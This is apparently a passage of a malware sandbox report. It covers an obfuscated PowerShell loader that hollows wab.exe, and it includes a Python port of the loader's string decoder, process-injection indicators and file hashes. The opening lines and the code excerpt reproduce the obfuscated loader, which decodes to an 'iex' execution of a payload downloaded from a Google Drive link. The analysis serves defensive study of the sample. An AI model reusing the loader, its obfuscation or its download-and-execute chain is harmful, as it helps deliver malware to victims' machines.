AnchisGSoftbale un,ramtCompartS KongretKrage.orSlaggedi OverponRullersgF shmou(outland$Tildigts PrevienForsknia Ra.finpkulbuelsDalstrgeHyperdit AerostiSubdepanHopefulg,ladderehemicyctEro.ogesBize.ma)P.rsone ');Oversway (Tvivlesyg 'Hypercy$Varpet.g,wiftenlLegatesoR ggersb,urisdiaNaturlolrocke s:StyringS PostichAftopnioMangilyvTrowabliMoskusknSubethfgNatbord=Theater$StichosEEkspo,etFysiurghbukse,noAloysiaxLemperui T gneseV.ndudssLushnes1 Brneli1Karenst9Purlgse.RetropesMilvusiuDubietibAntikvasFlappert BodhisrBrugskuiSalgsstn Coventg Dressm(Jernfor$ FintmaKP,leogerStrkni.i KrlgtegNonpenasRevendffTak,eska Cathetn F.ldepgLindedeeBesparerVerdenssVin,ues,Konkre,$ BespirCPosteroo SpegepuRaaglasnKarbonatSluddere Platear.nefuldm.anacetaForsty.nSoarer dSkriftesUnrem,t) A,hron ');Oversway $Shoving;"3⤵
      - Suspicious use of NtSetInformationThreadHideFromDebugger
      - Suspicious use of SetThreadContext
      - Suspicious behavior: EnumeratesProcesses
      - Suspicious behavior: MapViewOfSection
      - Suspicious use of AdjustPrivilegeToken
      - Suspicious use of WriteProcessMemory
      PID: 2000
      - C:\Windows\SysWOW64\cmd.exe
        "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Scrouge.Swi && echo t"
        PID: 1528
        (The command line names system32 but the image loaded is SysWOW64\cmd.exe: WoW64 file-system redirection, because the parent is the 32-bit PowerShell.)
      - C:\Program Files (x86)\windows mail\wab.exe
        "C:\Program Files (x86)\windows mail\wab.exe"
        - Suspicious use of NtCreateThreadExHideFromDebugger
        - Suspicious use of NtSetInformationThreadHideFromDebugger
        - Suspicious behavior: EnumeratesProcesses
        - Suspicious use of AdjustPrivilegeToken
        PID: 2608
        (wab.exe is the Microsoft-signed Windows Contacts binary. It is started by the 32-bit PowerShell (PID 2000), which the SetThreadContext and WriteProcessMemory IoCs show writing into it and redirecting its thread; the anti-debug calls then come from wab.exe itself, consistent with the payload executing inside this hollowed host.)
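The PowerShell stage above is a stride-based string obfuscator: every literal is a filler of Danish-looking words and `Tvivlesyg` walks it with `Substring($i, 1)` for `$i = 7, 15, 23, ...` while `$i -lt Length-1`, keeping one character per eight. `$Hjemsgelse` decodes to `iex`, so `Oversway(x)` is `. iex x` and each `Oversway (Tvivlesyg '...')` call executes one decoded statement. The block below is an added example (a Python port of the routine, not the sample's or the sandbox's own code) that decodes the assignments copied verbatim from the command line above; the expected outputs stated in the usage note were computed with it from those strings.

```python
import re

# Port of the sample's Tvivlesyg routine (added example, not the original):
#   For ($i = 7; $i -lt ($s.Length - 1); $i += 8) { $out += $s.Substring($i, 1) }
# Keep every 8th character starting at index 7. The bound Length-1 means the
# filler's final character is never read, which is why each filler ends in a
# padding character (a space).
def tvivlesyg(filler: str) -> str:
    return "".join(filler[i] for i in range(7, len(filler) - 1, 8))


# `$Name = Tvivlesyg '<filler>'` assignments; the fillers contain no quotes.
ASSIGN_RE = re.compile(r"\$(\w+)\s*=\s*Tvivlesyg\s*'([^']*)'")


def decode_assignments(script: str) -> dict:
    """Map each variable assigned from Tvivlesyg to its decoded value."""
    return {name: tvivlesyg(raw) for name, raw in ASSIGN_RE.findall(script)}


# Constructed excerpt: five assignments copied verbatim from the PowerShell
# command line in the process tree. $Enhardy is split into two literals where
# the report wraps the line; the wrap falls on a space that is part of the
# filler, so the literals are concatenated without adding or dropping anything.
SCRIPT_EXCERPT = (
    "$Tiplet=Tvivlesyg ' Sed.elMStershaoDidymisz Hurry.i AkvarilSy heeklinextr a unolog/Prisonf5Ioniser.Sultana0Plateau Topa,ol( PrinteWleukophiYdmygstnGldelsedkomediaoEndel,gw Mercedsblokker ,tabstaN Strst T Pr pre Grometr1 Perine0Brtsejl.Ukrnkel0Aa nend;cinquef A,venarWUndis,oi Impa.snra,gedn6i citat4Fundame;Unidyll E.ilicsx Antise6Sekunde4Furcife; Im,alm DramatirUnirascv L,erst:Program1Scattie2P.imrko1Rabbitl. Tampon0Serjean)Lgetsob Pesh.toGkontr leCantatoc bucibak.ncrankoEndoper/ Ophtha2Unossif0Plastom1Nulpunk0Ne vebu0Fulth,r1 Handma0Reformp1Beachhe GuldaldFKudizeoiUdgrfter rlenate,uccinifAciculuoaglipayxLnindeh/Resgues1avancem2Optaell1Startel.Forspil0Latente ';"
    "$Leucadendron=Tvivlesyg ' Au,optUAppeases .kkemoe,lankearT,aditi-NarcissAGiordang eje,doeSal.antn Kdva,etRefl ks ';"
    "$Enhardy=Tvivlesyg ' LaborahTri,ngut HjlpeptDriftsipGaleasesSvingta:Con lob/Subtaxo/vebgernd LairmerfremmeliKv.ddervInksta e ma,rop. "
    "Pr gragSmalskuo AdjudaoKlipning.loreatlBeseecheHaspnin.Autogencambulato Rentenm Unhurr/Daoinesu Samme.cEn iche?Paaskese Ko,sulxliflighpanhuggeo IdemanrChieft tRestbal=stoffrid Po.byco Rep,riwpa sionn Jeopa,lGalapagoBum.assaMessi.gdAldocoo&Gnidni.iKo.dnindOverdoz=F,ntina1Chassep_SceneriNExaratiXRisikobtComptinWCrappi L,ntipudoHvedemewIndoktrEDermatrLJoker eOT.rnebr3Adiat eAMentaluw Adminil,emalsnTRemolliGIm.atieXSuppl m2.raktatJ SeminaRbob,nerPOtoplasLIn.rejsdAdderesc JennetR Lyk,es1Reentraa.rstninXasnerscE HemidaRInvpegaJPaatage ';"
    "$Eigenvalues=Tvivlesyg ' gump.i>Fo.blff ';"
    "$Hjemsgelse=Tvivlesyg 'Arbejd.iAdjoin.eproduk x Skn.it ';"
)


def decoded_script_variables() -> dict:
    """Decode the excerpt above; the result is the loader's plain-text config."""
    return decode_assignments(SCRIPT_EXCERPT)


if __name__ == "__main__":
    for name, value in decoded_script_variables().items():
        print(f"${name} -> {value!r}")
```

Decoding these five gives: `$Hjemsgelse` = `iex`, `$Eigenvalues` = `>`, `$Leucadendron` = `User-Agent`, `$Tiplet` = `Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0` (the header value sent with the download), and `$Enhardy` = `https://drive.google.com/uc?export=download&id=1_NXtWLowELO3AwlTGX2JRPLdcR1aXERJ`, the Google Drive download behind the "Legitimate hosting services abused" signature. One caveat: the scheme is whitespace-sensitive, and a rendered page collapses runs of spaces, so some of the longer `Oversway (Tvivlesyg '...')` fillers on this page no longer align on the 8-character stride and decode to garbage from the collapsed point onward; decode from the script as dropped on disk or from the raw sandbox export rather than from rendered text.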
Network
MITRE ATT&CK Enterprise v15
Downloads
- Filesize: 8KB
  MD5: bdbffd38aaa980265fd1c77b0aaf4e5f
  SHA1: 841cbd0639dae47588ee6b8df96913c7591b2972
  SHA256: 7f33b721d070f46062950b6f911bf686d88cfed96f282f1e85d1b5ce582a0cc0
  SHA512: d96d23b41504729b27a19695610bc7f1d2407a63d143e56bc32bd181b82c3f10ddf4194ee8b85154b1eff9d756997d08e29bc22ab5bc61ef4afc918cdb2ef4da
- C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\XJIHEOZVIJUM3A5FV6UP.temp
  Filesize: 7KB
  MD5: 4a3f90c4fc2e2cd2fad2a2ef38450277
  SHA1: cf710b9b4453da4587753344430ba4d68232e85d
  SHA256: fbeef3fc8305f2903da9ab884bd2017b586281e06210253cacc88dc747d0a449
  SHA512: c8f359f5a5c4925c5852dde20c4442f93cf849691c35f8e5fc15340ae7ef2e0efd696c345c6becb2b65dfd5129b7c375f1d3dffd5d7e3303e6ac22ac84df1689
- Filesize: 494KB
  MD5: be60fe46432e08e827aeefd9f72d5790
  SHA1: 7322ebc77810e84976136174258dddde78a23f27
  SHA256: 8722cb6fe1e75ddcd9127b92f438e2b0155eab29cc29270ca7aa35be9edff7b4
  SHA512: 72a7e93c1c1d78260ec1ac1438450baf4d6f21a1299824878e405a115c8318796d7bf233db80d42f8d66ab1c73531741965fbf1e9679a1fb2071bab9d8b9e913